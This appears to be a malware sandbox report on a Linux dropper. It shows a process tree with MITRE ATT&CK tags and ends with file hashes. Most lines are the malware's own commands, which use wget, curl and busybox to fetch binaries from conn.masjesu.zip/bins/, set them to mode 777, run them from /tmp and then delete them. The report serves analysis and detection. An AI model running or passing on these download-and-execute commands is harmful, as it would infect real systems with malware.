/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:955
-
-
/bin/chmodchmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do./oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- System Network Configuration Discovery
PID:971
-
-
/bin/chmodchmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- System Network Configuration Discovery
PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- System Network Configuration Discovery
PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- System Network Configuration Discovery
PID:986
-
-
/bin/chmodchmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:994
-
-
/bin/chmodchmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:1004
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:1005
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1006
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- System Network Configuration Discovery
PID:1008
-
-
/bin/chmodchmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- File and Directory Permissions Modification
PID:1009
-
-
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Executes dropped EXE
PID:1010
-
-
/bin/rmrm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:1011
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- System Network Configuration Discovery
PID:1012
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1013
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- System Network Configuration Discovery
PID:1015
-
-
/bin/chmodchmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- File and Directory Permissions Modification
PID:1016
-
-
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Executes dropped EXE
PID:1017
-
-
/bin/rmrm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:1018
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- System Network Configuration Discovery
PID:1019
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1020
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- System Network Configuration Discovery
PID:1022
-
-
/bin/chmodchmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- File and Directory Permissions Modification
PID:1023
-
-
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Executes dropped EXE
PID:1024
-
-
/bin/rmrm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:1026
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
16B
MD57689ca8c5bc85cf6b78ef89323d4df6a
SHA1a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA25617dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA51240f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471